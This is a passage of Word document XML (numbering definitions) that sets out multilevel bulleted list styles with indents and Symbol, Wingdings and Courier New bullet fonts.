        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EADCC306">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="52F4D47A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0C8A8D0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D5EEC9E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5F8A8E9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="807C8B74">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="80D4E9FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3A61D680"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A3F47280">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="31BC4CC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="51BAB202">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7CCCFB32">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5BECC3F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A8067ADA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A3C2D256">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D08C1C16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E5BC0E48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3C591DFE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="94D0649C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0CC8CE26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="24A429B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C6064A3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="94FADAE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="27B2203E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="373A3882">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="555E6144">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D9E82CE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="39" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="446778A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="ED2A1D16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1E3ADEB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9C68E264">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D7A8DD00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E9D2C2B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B6FC900C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AE349F56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="34C28162">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F1F61334">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4573511A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="09F0B8C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0E121516">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="58E49B86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D614364A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="11624288">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B964B7C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8B0253BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D904E6AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D7DA417C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46CE0A30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="45368DA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2D9C3836">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C390E586">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DDDCDB14">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="34EA7888">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9D6E1CFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="74BCBCBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5C26864A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5878551E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="42" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4762B57F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5F2EDD30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FA6CCB24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C7824CC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CF7C51CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DB8E80D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D01A2C72">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="87A8C260">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8996E1EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A66019CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="43" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="477B791F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAF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961364"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="92F64D90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="11380B5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8682D098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DB363372">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="14C4F40E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6BB0AC34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
